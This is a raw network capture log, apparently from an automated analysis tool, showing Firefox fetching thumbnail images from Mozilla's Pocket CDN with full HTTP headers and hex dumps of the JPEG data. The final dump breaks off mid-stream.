2024-07-26 18:11:01 UTC	886	IN	Data Raw: f1 66 f4 64 e5 5f ca 69 31 d5 db 95 51 22 79 df 76 14 43 5a 4e 67 77 2d 46 2f d3 ae 88 64 0a 37 6d ee 9f 85 c4 80 61 c7 45 e8 33 6c 48 58 bf 41 d0 dd d0 f2 9a a2 47 aa 79 2f 83 51 32 08 db a9 da 26 e5 26 3f 29 4d 30 64 e6 3a 9d 6e d5 31 c0 e8 fc c1 c8 fd 9c 83 23 b9 36 c2 da fe 2b ae 45 91 d3 65 16 09 d7 22 62 3a 10 e9 b9 51 7b 64 17 4a 0c 71 e8 c9 36 c5 66 9c 1d df 09 b4 db fd 23 ea 87 94 d2 b1 d7 08 55 8b 6a 34 1d 9a c0 df 9f 9b ad 72 0e f8 85 12 b9 36 81 dc 81 f0 50 8e 2c 8e 5d 28 87 17 bd 99 10 d1 94 a6 f9 4b 78 00 99 13 84 8f c4 b1 b8 02 33 41 96 00 5c 78 27 de 03 40 31 b2 8d 6f fe 13 b6 44 c1 2d 09 a7 26 49 60 ed 4f c5 50 35 b9 9e 54 97 fa 5a 5d 6e 49 ed 08 18 97 23 90 3a a9 69 31 a2 f4 5f 08 e2 05 e1 b9 7b 41 33 13 67 39 c2 70 fc 90 ec 03 a1 0c 9b Data Ascii: fd_i1Q"yvCZNgw-F/d7maE3lHXAGy/Q2&&?)M0d:n1#6+Ee"b:Q{dJq6f#Uj4r6P,](Kx3A\x'@1oD-&I`OP5TZ]nI#:i1_{A3g9p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	64209	34.120.237.76	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	549	OUT	GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fmedia.wired.com%2Fphotos%2F669ee1db82dcc6be43bb872a%2F191%3A100%2Fw_1280%2Cc_limit%2FAMOC_Laerke_011.jpg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:01 UTC	1124	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 8722 x-amzn-RequestId: 0a08c614-163b-44a3-a875-7ca992d9c603 X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Frame-Options: DENY Content-Security-Policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: bgiqkHJMoAMErjg= X-Content-Type-Options: nosniff X-Amzn-Trace-Id: Root=1-66a34b10-51e79c68444650627ef4c8a1;Parent=7784e224e624e387;Sampled=0;lineage=69363f46:0 x-amzn-Remapped-Date: Fri, 26 Jul 2024 07:06:56 GMT X-Amz-Cf-Pop: HIO50-C1 X-Amz-Cf-Pop: SEA900-P2 X-Cache: Hit from cloudfront X-Amz-Cf-Id: Bkff3qI4vHyHqHsqUkR9tKAcMqVgiXicgIk3CKaYLqljzrgnFcV7Pg== Via: 1.1 0c96ded7ff282d2dbcf47c918b6bb500.cloudfront.net (CloudFront), 1.1 ec755748cbd7b2d4be21ec10aeea31ae.cloudfront.net (CloudFront), 1.1 google Date: Fri, 26 Jul 2024 07:06:59 GMT Age: 39842 ETag: "f573341f833552e91251a321a0f6acde009adcd6" Content-Type: image/jpeg Cache-Control: max-age=3600,public,public Alt-Svc: clear Connection: close
2024-07-26 18:11:01 UTC	266	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 00 94 01 28 03 01 22 00 02 11 01 03 11 01 ff c4 00 1b 00 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 03 04 00 02 05 01 06 07 ff da 00 08 01 01 00 00 00 00 a9 df 9d 3d 7d 38 ad 9b 4a b4 dd ed 4e 8c 85 a4 80 e7 42 bd f3 d5 50 45 41 87 c4 6a 1d 96 b4 53 bb 35 8c 14 05 24 ef 25 41 4e 0d Data Ascii: JFIF++&.%#%.&D5//5DNB>BN_UU_wqw++&.%#%.&D5//5DNB>BN_UU_wqw("=}8JNBPEAjS5$%AN
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: bd fa 79 2d 5d 2a 96 56 dc 83 a5 69 9f 9a 52 cc 20 31 99 a0 c1 63 0f cb d2 37 61 92 03 5e c2 49 b3 f6 2f 59 6a 57 15 19 71 55 50 96 fa 85 05 dd 38 97 34 76 52 34 3c ed b0 9a c0 9c ad bb 95 98 ce 60 46 b3 83 7a f6 bd ab 64 9b d5 45 ad 32 d4 aa 4e f1 eb 08 32 51 61 e7 67 ab a0 ca 18 ba e5 79 46 f3 ee 53 e8 6a a0 c1 ee 54 b2 9d ad 9f 34 10 a8 1c 51 af a2 45 f3 49 9c e0 a6 b8 c5 03 a4 eb fd b5 ee 25 93 d4 ee 55 f5 2d 58 14 f3 57 68 c4 54 09 10 b7 f3 db ec 06 fa 8c 16 fd b5 c8 9e 63 0c 16 79 3f 50 f2 a5 82 cd 40 ea 9d 56 13 e2 0b eb b6 8b ac 3c 43 16 d7 13 09 79 fd 53 72 62 fa be 2a 78 90 f3 c2 3e 51 db 8b ca bd ae d6 5e bd da 6b a2 23 72 d7 f0 1e 80 f7 f2 7e f2 bc 53 b0 38 6b b6 7e a3 d8 bf 92 f5 07 07 a7 a4 62 e4 bd ed 7b cf 1a fe 9a b9 5e aa 0d 21 1a 60 68 Data Ascii: y-]ViR 1c7a^I/YjWqUP84vR4<`FzdE2N2QagyFSjT4QEI%U-XWhTcy?P@V<CySrbx>Q^k#r~S8k~b{^!`h
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 2a 4e 5f dd e6 2c 7b 55 e2 5e d6 fe 14 9c 96 ec e2 a5 3a 32 aa 2d ad 91 f4 e6 82 b0 ef 05 c9 1f b2 4a a4 2b c5 ff 00 90 4c 12 f3 9b 80 5e 44 92 d9 58 f1 a3 af c8 45 b2 01 ef 78 bb 3a 37 93 7b 99 1c 6a 1f 30 98 20 70 bf 75 3e 8a f3 c4 76 35 e8 0c 6f 97 b6 6e 12 11 28 54 33 13 a7 fd 9b e2 87 f0 92 9e f8 b5 3e 43 32 a9 d9 cd 80 1b 9f 41 ed e8 10 d0 8e 2e db fe 25 41 1b 07 5a e4 5b 72 43 be 36 59 dd 08 52 27 3a 17 40 fb d8 f6 35 cd 6f 9b f5 af ec 91 bd b0 2a 5f d7 ad ec 82 00 f5 c0 fb e3 46 56 23 c8 bb 34 40 24 57 c7 d8 5a 01 95 cb 15 08 92 8e 14 4a 2d db 49 38 e5 0d d6 44 ae 38 f1 91 8c 34 cb 9f fb 4d 49 5e 89 19 d3 b9 14 25 b2 af 95 8f 31 d4 12 a3 26 6a 11 25 32 51 7e 9f 8a 42 17 82 76 fa 6a 7a a0 5a 31 81 28 f6 1f 8e 91 bd 1d 28 c2 3d 83 9c 8a 29 3a a8 31 Data Ascii: N_,{U^:2-J+L^DXEx:7{j0 pu>v5on(T3>C2A.%AZ[rC6YR':@5o_FV#4@$WZJ-I8D84MI^%1&j%2Q~BvjzZ1((=):1
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 6d f4 8c c6 f9 97 94 98 d1 24 b0 5e 7f 8b 63 52 e9 95 f5 9c 80 45 0f b6 1e bd 03 d8 6f f1 c7 28 29 15 66 5d a1 05 89 1a 3c 73 fe c6 b8 d9 73 03 f1 4e 53 2e 65 7c 6a 48 a6 8c dc 28 ca a1 9d ee 88 0b b9 1b 9d f2 28 48 94 f4 b6 c4 a3 46 65 f2 59 9a 08 f3 2e 80 20 29 50 93 f1 38 45 e4 5e 0e bd 92 91 3c aa a1 f4 c8 08 c7 b2 62 60 de 80 f3 e9 f8 9f 6d 19 86 3d 9e 2c fb f7 b3 c6 b8 f1 ff 00 d6 3c 73 2f 2a 2c 97 ac e5 23 86 0b 1a cd b8 3e e8 b2 3b 34 d8 42 41 55 14 81 cf cb 71 b6 01 d2 ec ef 28 03 b9 4f 88 72 19 c7 60 8b cf f5 cf 7f fe 73 ae f5 a3 ae 74 ff 00 ae 42 88 57 36 08 75 5c 4a 06 94 dd ce b8 8c 1a 61 b8 a7 5f 22 36 df 56 0f f5 3c ac 5f a5 23 1e 2a 84 4e a1 42 a9 27 f5 1f 93 e9 74 07 29 19 3d f6 f3 53 c5 84 d1 c1 50 17 8c 6c d3 26 40 07 b5 32 e6 85 8f 84 Data Ascii: m$^cREo()f]<ssNS.e\|jH((HFeY. )P8E^<b`m=,<s/,#>;4BAUq(Or`stBW6u\Ja_"6V<_#NB't)=SPl&@2
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 52 85 cc 42 db ff 00 91 55 ec 5a 03 80 90 a9 bd 6f cf 2d 01 e5 40 52 81 d7 b2 91 cd 90 da fe ed 19 d1 49 79 a9 39 68 93 ac 3c 21 45 2f 7c 88 00 f6 94 cc c3 86 50 47 23 ec 17 3f 97 ff 00 67 93 3b df 2d 44 55 d9 e2 e5 5e 8c 3a 43 e3 19 51 13 a5 08 68 0d 99 c5 15 81 3e 30 e8 0d 6e 18 08 cb af 80 48 00 82 67 4e b4 71 c4 97 82 7f b3 aa 22 38 74 06 ae cd 20 36 34 09 2b 42 01 3e 37 2c b5 a1 b1 f9 4c 15 f2 2e 86 d4 a9 d2 da 63 fe 31 28 ef 4f 7b 5f 26 aa 01 3e fe 7b d1 3c cc 88 c8 c6 a4 db f0 93 d2 22 6f d4 eb d0 74 41 c2 76 09 27 96 4d fb e7 d1 ef d3 27 a1 e3 6f 5c 1e a8 00 05 43 de fe f5 8d cc 9a e5 08 58 ac 07 69 b6 00 98 43 8c a3 84 5f 06 c1 17 de 28 07 b7 ba 36 dc cd 10 b3 b1 0a 94 34 ca 7b cd 08 47 ee e8 4e f4 31 7f f1 ac f8 ee c5 04 dd 16 48 14 12 2d 95 04 Data Ascii: RBUZo-@RIy9h<!E/\|PG#?g;-DU^:CQh>0nHgNq"8t 64+B>7,L.c1(O{_&>{<"otAv'M'o\CXiC_(64{GN1H-
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: b3 c5 07 9d d4 44 a3 e7 d1 3f b0 8e b0 30 42 34 01 c0 41 f6 68 9a fd de 22 4a d9 87 17 41 bf 09 44 34 b0 b4 9d d1 ab b1 15 0d 76 28 a9 13 53 fd 91 33 86 df fc a6 48 69 42 3e e1 11 04 12 0c 8e 6e 5b 41 18 62 49 1c 9a 9a 19 00 92 60 d6 7a d6 e4 a1 3f 6c f7 34 18 0f 21 db db dd e4 70 b9 c4 88 af 5a 3c d0 b1 26 b6 ec f7 af 55 d6 10 d9 3c dc 1c b2 00 c7 8c e5 75 b1 da 40 c0 ee be a9 b6 04 5b e2 a2 22 a4 db fe ab 32 5c 66 3d d5 78 99 fe 48 66 51 5c d4 c1 77 d9 ab 62 69 cd c0 4a 06 40 89 46 e9 c8 e7 ad 7a 77 91 5d d7 42 01 c4 4b a7 24 4b 6b 07 68 50 12 5a 19 06 27 bc 53 b1 41 2f 28 b1 a0 b9 c2 e7 de c9 03 6c 50 0f 84 20 5d 50 64 b4 6a d4 e2 e7 38 bd bd 61 f9 53 12 47 de f9 de cb 1b 49 22 2c e1 4c 5d d5 15 90 23 ea 9f fa 97 1c 5e 8c e0 02 70 cb 9e 86 cd bb 4d 95 Data Ascii: D?0B4Ah"JAD4v(S3HiB>n[AbI`z?l4!pZ<&U<u@["2\f=xHfQ\wbiJ@Fzw]BK$KkhPZ'SA/(lP ]Pdj8aSGI",L]#^pM
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: bc 37 7d 9d 10 13 33 58 d5 1e f7 40 19 a1 72 a6 ca e4 a1 c1 0e 09 bb 7c 26 9e b0 2b 5e 8e 48 19 4e 13 75 cd 71 2a 78 e8 b7 88 a2 36 a2 e4 8d e0 5d 37 0d 09 14 0b 40 42 7d e0 dd 67 53 50 80 a0 e2 89 b4 65 a2 e4 88 8b 27 ef 71 c1 21 d1 e4 9d 67 34 9a fb 49 a2 48 93 53 92 23 a9 8a a7 08 c3 0d d1 34 ef 49 7d 35 13 29 b5 ae ce 9e f0 8f 9a 35 92 24 46 8e 11 1e 48 1c 0e a6 03 3d da 59 44 10 5c 4a 27 d5 51 44 c4 ef aa 08 8c 87 43 07 a5 1f fa 8e 24 33 43 b4 f5 ec af 59 9f 84 c3 84 11 98 c9 1a e2 c5 6f 05 63 79 3e c8 40 cc c1 30 a2 ab 20 5c 25 1c fa 22 e4 22 68 c6 88 9f 6b ba 81 de 2c 71 96 8d 61 c3 a3 1b a3 80 fd 8d c4 1c 0d 88 70 ed 1f b0 43 67 02 05 08 cb 12 75 81 38 f0 f8 b5 4e 19 2c 60 83 d5 51 2e 00 8a f1 4f da 48 38 c4 13 18 63 fb 26 86 5a 2c db fc 4a 1c 40 Data Ascii: 7}3X@r\|&+^HNuq*x6]7@B}gSPe'q!g4IHS#4I}5)5$FH=YD\J'QDC$3CYocy>@0 \%""hk,qapCgu8N,`Q.OH8c&Z,J@
2024-07-26 18:11:01 UTC	116	IN	Data Raw: 6d 81 d5 55 6c 2b fe 24 ad af 03 56 5e 95 15 4a 8d cb ab 11 8a ca cb 51 57 63 05 55 56 ca e3 b3 72 23 ce 32 bf 71 56 56 d6 87 86 55 6d 9c a8 f5 76 b2 98 45 a8 aa 2f 47 e5 f4 2f 22 2c fe 42 d5 76 22 56 96 ed 73 df 5f 98 ca c5 f0 9f 6c 92 fe d0 4b 9c db dc 5c e7 f9 9d f2 37 b1 81 7a 37 56 17 91 8f 64 1f da 0f fb e3 d3 3c ff 00 c5 fe c3 19 3f ff d9 Data Ascii: mUl+$V^JQWcUVr#2qVVUmvE/G/",Bv"Vs_lK\7z7Vd<?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	64207	34.120.237.76	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:01 UTC	509	OUT	GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs.zkcdn.net%2FAdvertisers%2F8c6ba27004c947fdb8667ce4914d41c8.png HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site
2024-07-26 18:11:01 UTC	1101	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 11118 x-amzn-RequestId: 08b4af30-b0ad-4909-9aff-510ad806746b X-XSS-Protection: 1; mode=block Access-Control-Allow-Origin: * Strict-Transport-Security: max-age=63072000; includeSubdomains; preload X-Frame-Options: DENY Content-Security-Policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: bLggxEuQIAMETDg= X-Content-Type-Options: nosniff X-Amzn-Trace-Id: Root=1-669ae137-170fa15730e8c3b156cf8237;Parent=1996299bc2fe8ed5;Sampled=0;lineage=69363f46:0 x-amzn-Remapped-Date: Fri, 19 Jul 2024 21:57:11 GMT X-Amz-Cf-Pop: SEA900-P2 X-Cache: Hit from cloudfront X-Amz-Cf-Id: -JpugiNMklJ2Q_9FHVR4vor6t3E_Y4qpJyO_Gzn97ZDNSjlm7Z9NgQ== Via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 f9901b257e7117ad9d6c331954cb762c.cloudfront.net (CloudFront), 1.1 google Date: Fri, 26 Jul 2024 06:41:22 GMT Age: 41379 ETag: "aed7e5d4829524f8d2f84c572addd38b94670e4b" Content-Type: image/jpeg Cache-Control: max-age=3600,public,public Alt-Svc: clear Connection: close
2024-07-26 18:11:01 UTC	289	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 84 00 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 01 08 08 08 08 09 08 09 0a 0a 09 0d 0e 0c 0e 0d 13 11 10 10 11 13 1c 14 16 14 16 14 1c 2b 1b 1f 1b 1b 1f 1b 2b 26 2e 25 23 25 2e 26 44 35 2f 2f 35 44 4e 42 3e 42 4e 5f 55 55 5f 77 71 77 9c 9c d1 ff c2 00 11 08 00 94 01 28 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 02 03 01 01 00 00 00 00 00 00 00 00 00 00 05 06 03 04 00 02 07 01 08 ff da 00 08 01 01 00 00 00 00 09 f4 0e 66 79 4a ea 85 eb b6 96 a2 82 76 7e 0f dd be 60 6a 7b df 86 f6 2e 72 da 71 77 a3 97 53 80 c9 c0 23 53 3b de b9 9b 6b Data Ascii: JFIF++&.%#%.&D5//5DNB>BN_UU_wqw++&.%#%.&D5//5DNB>BN_UU_wqw("fyJv~`j{.rqwS#S;k
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 99 9d 1c f5 50 fc 59 a3 a0 d4 e9 70 28 70 c5 ee 9b 46 9f 59 99 75 3e 6e 88 c4 9b 5f a7 57 02 3d 17 e8 5d 6b 84 57 3e c2 82 0b 97 12 e8 54 4c 1a 5d 73 12 84 89 d8 b5 61 93 29 72 93 0d 8e 7c de bf 5e ae 0c 67 33 fa 63 06 ab 8f 91 b1 28 6f 29 f5 fa ef 44 0b 45 90 68 64 de 85 6a c4 3e 86 5c 38 60 b8 8b 0d 35 17 83 f3 bf a5 c7 69 6a de 67 2e 1f ca b4 7b 03 d4 2e d2 26 00 a8 f1 36 2c 43 64 7b e4 4a ed 4b 11 39 5a 5b 55 52 fa 4e 51 fa 13 58 99 44 82 75 d2 eb 56 2d ee c7 4e ae cb 57 77 c8 f1 90 7b c8 81 97 6f 59 51 53 b1 d8 b9 97 4d 82 fa 58 e9 4c c1 77 c1 c9 f5 58 8c 16 e6 8c 5e 8d 86 11 46 ac c8 f2 a3 2c b8 5a 1d 12 18 19 09 45 a7 ba 8e ac 3a 99 75 58 81 41 d6 95 96 c8 99 66 1a 9f 13 06 39 6e b1 5d 30 e7 43 0b 57 96 fd 0d 5d 76 be 9a c4 b1 38 52 0c b4 45 ae 04 Data Ascii: PYp(pFYu>n_W=]kW>TL]sa)r\|^g3c(o)DEhdj>\8`5ijg.{.&6,Cd{JK9Z[URNQXDuV-NWw{oYQSMXLwX^F,ZE:uXAf9n]0CW]v8RE
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 59 63 63 de ca 61 aa dc e9 22 d8 85 a2 8c 9e 14 8d 9b 5e 14 99 ac f6 bc 13 c7 47 d9 52 33 12 00 90 87 8f 52 da ed a1 40 46 a6 c7 51 b1 b1 1e 8e 67 e4 b6 52 52 b4 40 37 08 2b 49 65 05 1a a4 d4 99 ca 11 2d 07 e9 c9 2d c9 1d c8 10 5e ec 52 95 e9 a3 8b e5 85 4b bb 42 94 91 50 99 f6 eb 73 56 52 7c e6 6a 95 b6 68 68 05 d9 a7 3b f3 77 f6 03 cc a9 fe b6 39 d0 8c b4 0a 9a d4 9f bd bf 26 bf 67 8e 44 7c 72 5b 9a cd 0d 07 81 63 29 7a b5 11 35 4a 0d 14 9f 6e 5c c7 ea 06 e7 e2 55 22 d3 91 33 43 90 3f b6 0d dd aa 7e db cf 9c 38 f8 47 b0 b7 62 2d 3d d5 cf 8d 70 90 47 55 99 40 14 50 47 4e 97 7e 5c e7 51 69 1b f4 32 9c 39 b1 7a a6 0f 6f 53 e0 48 ec 57 00 a2 8c d0 e3 ba f9 e2 0b a8 d2 86 1f 4c 29 05 f3 80 ae 11 d3 b5 3f b6 bd f9 f7 9e 58 a3 f4 b7 79 89 ec 0b cf 2a 49 a1 d6 Data Ascii: Ycca"^GR3R@FQgRR@7+Ie--^RKBPsVR\|jhh;w9&gD\|r[c)z5Jn\U"3C?~8Gb-=pGU@PGN~\Qi29zoSHWL)?Xy*I
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: cb 0f 36 69 6b ea 44 57 64 80 b4 d6 76 76 48 e6 59 d6 ad d2 5c b5 8a b1 89 1e 16 f1 e4 4f 6c 9e dc d1 c3 36 c5 43 14 cd e9 66 f3 9e 1b 36 e9 5c a6 1f 55 9b 04 1b 79 b9 de c8 61 87 c0 d6 49 9b 12 8a 51 95 e8 58 fd 28 85 2c 0c 41 e8 f2 cd 22 c5 5b a4 97 1c cc 9a 30 73 a9 24 f2 6b a4 b2 8b e6 58 0e 06 25 ab 78 a0 73 53 a8 fc f9 55 97 af f6 d7 b5 6f f4 4d a0 87 75 da 93 ab 26 63 a8 5a e6 e4 ff 00 e6 74 39 d0 e0 cf 97 8e ce 9d 4b d3 56 54 57 1b 3a 98 a8 02 86 17 eb 9a 37 54 27 ad ba b0 0b de b4 b1 74 f6 7c 29 68 db 0e 9d f5 8e da 78 8e 31 39 e1 23 1d 43 95 3a 99 cd 56 73 8c 41 84 80 86 c6 23 40 1e 0e 8b e5 b3 29 ad 6c 1d b5 49 ae 34 a3 1d b0 57 4b 59 7b 4a 0b da 7b f2 11 0c 7d ac 09 b7 de 11 a4 77 99 34 5e 99 b3 12 0d 13 a9 5b cd 41 bc d9 8d 4a 4f e1 8f d3 37 Data Ascii: 6ikDWdvvHY\Ol6Cf6\UyaIQX(,A"[0s$kX%xsSUoMu&cZt9KVTW:7T't\|)hx19#C:VsA#@)lI4WKY{J{}w4^[AJO7
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 07 f7 38 4a c1 8a 46 4b ec bc aa e0 14 25 88 03 aa b9 66 a7 8d 8c 69 a7 85 fe 4f 4f 78 5d 9a 6e 6d 9f 51 8f f9 74 d1 89 0f 59 7e 67 12 e5 50 24 bf 68 ef 5e 66 9c 89 e9 0a a2 b9 6d 69 f1 96 a9 00 9b 58 5d 58 e1 e9 64 0d 5c 0c d1 6d 56 08 fe a6 6a 69 3f 75 d6 bf f2 d7 e9 5a c5 fc 7c ad 11 eb e7 4b e7 a8 64 e5 e3 7f b9 e7 fb e6 ab 66 5d 49 20 f4 de 65 8a 2b 62 ef da 61 45 f9 ab 79 fd 3d 4b 72 ca 04 8d 05 ab 1b fc 4d ae 69 7f 9b 9d cf 29 fe 20 9e 00 be d0 b4 32 4b e6 f9 0a 9b 8b 36 65 cf ee 19 9a 21 1a b1 78 c3 06 64 93 62 ed 7f ee 0d 1c 8a 47 d2 79 aa d9 88 cc af 3f f2 ff c4 00 45 10 00 02 01 02 04 02 06 06 07 06 04 05 05 00 00 00 01 02 03 00 11 04 12 21 31 22 41 05 13 51 52 61 71 10 32 81 91 a1 b1 20 23 42 72 82 b2 c1 14 53 62 92 a2 d1 33 63 c2 e1 24 43 83 Data Ascii: 8JFK%fiOOx]nmQtY~gP$h^fmiX]Xd\mVji?uZ\|Kdf]I e+baEy=KrMi) 2K6e!xdbGy?E!1"AQRaq2 #BrSb3c$C
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 3c b2 28 40 34 fe 1f 40 27 eb 1b e5 5d c6 f9 54 18 63 24 38 a4 22 69 25 c8 57 28 cd 60 36 b3 57 71 7e 55 89 40 a4 de ce 87 4f 6a 9a 96 36 b1 bb 58 5a fd 94 b9 72 c8 cb be fe 83 6b ed 47 5d e9 48 0f 89 76 5b f3 17 ae fc e3 e0 be 82 3d f4 a5 81 49 c1 20 5f 2e a3 5a 75 48 e5 e1 ba 1c ef e7 6e 54 fd 62 24 3a 1e af 21 5c be d6 bd 77 db e7 e8 fd c2 d2 e7 c9 23 08 70 e4 de 34 0b cd 87 32 db d4 e9 1f 25 41 a9 3e 48 b5 d0 b8 c7 8d 87 ac ea 91 df d8 c6 9f 11 81 9d a6 64 9b ab 6b 13 a6 99 87 10 e5 5d 3f 8a 20 0b d9 91 0d 74 d7 48 49 7e 4a e2 31 fd 22 a4 c5 b1 1c da 77 bd 60 d6 43 db 23 19 3f 31 ac 5b 4f 1a 71 45 00 50 91 af 66 60 bb e5 a0 2f 19 ca 48 dc 55 8b be 4c b7 36 1b f6 d1 8b ab 8c 3d ec d7 27 32 15 a9 42 a9 36 17 e7 51 32 82 9f e3 31 d3 f0 8d ea 42 58 26 5b Data Ascii: <(@4@']Tc$8"i%W(`6Wq~U@Oj6XZrkG]Hv[=I _.ZuHnTb$:!\w#p42%A>Hdk]? tHI~J1"w`C#?1[OqEPf`/HUL6='2B6Q21BX&[
2024-07-26 18:11:01 UTC	1390	IN	Data Raw: 01 53 da fc 96 df 36 ac f2 0e 43 35 bf 2d 74 70 0a bf 69 a5 20 1f 8d 60 0a b9 1e b2 cc 6a 59 95 d4 b6 6c e0 11 e3 ca b0 b1 15 25 72 b8 1a 30 e7 50 20 f2 5a 00 68 d5 32 a9 33 28 00 b5 af 5d 91 7c 85 7e fb f4 15 04 6d 84 8e 03 66 95 6e 99 ee 3d e6 ba 3e 26 88 5f 29 10 8b 01 e1 58 15 90 b9 b2 22 c6 01 bf ba ba 3e c1 92 f9 59 5e e3 c3 6a c2 48 67 7c b9 63 4d 7d b5 d1 c7 29 df 86 4d 3e 15 86 9e 10 6c 58 aa 9c ac 79 f9 d4 2c ac 5d 83 00 39 d0 06 f9 1e 2b 8b 65 75 ac 23 23 c4 2e 16 da 4a 96 fb 26 94 83 92 d9 5b 75 d4 5f 4a 50 55 c3 c9 7e c2 b4 8e 25 05 c5 ed a7 08 ed ac d9 e4 9b 4e 13 6e 14 cd bf 2a be b4 74 ec ac 8d e6 82 a0 82 fb 82 10 0a 02 e3 b3 ce 8a 9b ef 5d 56 56 dc 65 d6 bf f9 4b f9 2a 32 ec 66 7b 05 52 4e fd 95 13 24 8a 8f 75 22 c7 7c d5 b8 ce 3f ac d0 Data Ascii: S6C5-tpi `jYl%r0P Zh23(]\|~mfn=>&_)X">Y^jHg\|cM})M>lXy,]9+eu##.J&[u_JPU~%Nnt]VVeK2f{RN$u"\|?
2024-07-26 18:11:02 UTC	1390	IN	Data Raw: 6c c4 dc 28 ed a9 ba e0 32 14 21 6c 08 e7 eb 69 50 96 26 66 96 e2 32 5d 45 f6 63 c8 54 4a 2e 8b ad b5 a9 72 e5 16 3a f8 51 b0 01 6c 49 d2 a6 66 e5 a7 f7 ac 34 93 32 0b ae 66 00 02 d5 84 4d 74 16 62 6f 58 58 a1 8c f6 82 5c fb 39 54 2c 58 8b 90 05 44 cc c3 70 39 52 16 65 dc 76 7a 13 ea d3 73 d9 f4 48 16 17 d6 ac 2e 6d ad 59 d3 bc bb 54 62 54 50 86 c0 eb 75 41 58 45 8d bf 8c 9a 64 50 4a 8d 12 f4 e1 51 37 35 75 85 7f c3 8f b3 c4 f8 fd 19 0f d5 4a ad 90 1b 72 d4 b1 a0 48 a1 a5 19 04 83 47 e2 d9 ea 01 24 48 8e 04 e3 51 66 4c bc 43 95 11 a4 6a 09 e6 74 d2 88 4b bb 8b da f6 d0 35 32 c8 ca 9a 17 7b 81 f9 45 08 c1 32 3a 23 01 73 91 8e 6b 79 50 76 16 50 42 8b 72 ed 6a cb 16 63 7d ee 69 99 cd ad 7b de b4 27 63 bd 0e aa 3b fa c7 9f dd 14 0b cb 6d 5d f7 fc 3d 9e 8d 03 Data Ascii: l(2!liP&f2]EcTJ.r:QlIf42fMtboXX\9T,XDp9RevzsH.mYTbTPuAXEdPJQ75uJrHG$HQfLCjtK52{E2:#skyPvPBrjc}i{'c;m]=
2024-07-26 18:11:02 UTC	1099	IN	Data Raw: c8 8f f1 d5 fb cb 3a 53 c9 5f e6 a7 75 ff 00 2a c4 08 d4 11 e6 a7 75 2b de 57 eb 29 fc 9f ff c4 00 44 11 00 02 01 03 02 02 03 0a 0a 07 09 00 00 00 00 00 02 03 00 01 04 12 22 32 05 13 10 11 21 14 23 31 33 42 43 52 71 b2 c2 15 34 41 53 62 63 72 73 b1 c1 06 20 24 45 51 92 d1 61 74 81 82 91 a1 a2 e1 f2 ff da 00 08 01 03 01 01 3f 00 03 61 08 64 7d 1e 09 53 22 dc 72 a3 d0 26 c1 94 07 37 6c b4 ba 24 15 40 43 3c e3 56 c0 ec 30 c2 23 5a a3 d6 45 82 c6 5c a1 e2 cc 49 72 c1 56 02 8c ae d8 cc fe 6c 21 86 bc 96 7a 27 73 13 3c 88 56 cd 5a f5 6c 8b dd 17 b6 00 90 ad 79 41 2c 4f 29 7a bb 4b a5 2d f7 07 81 83 37 ff 00 e6 0d b7 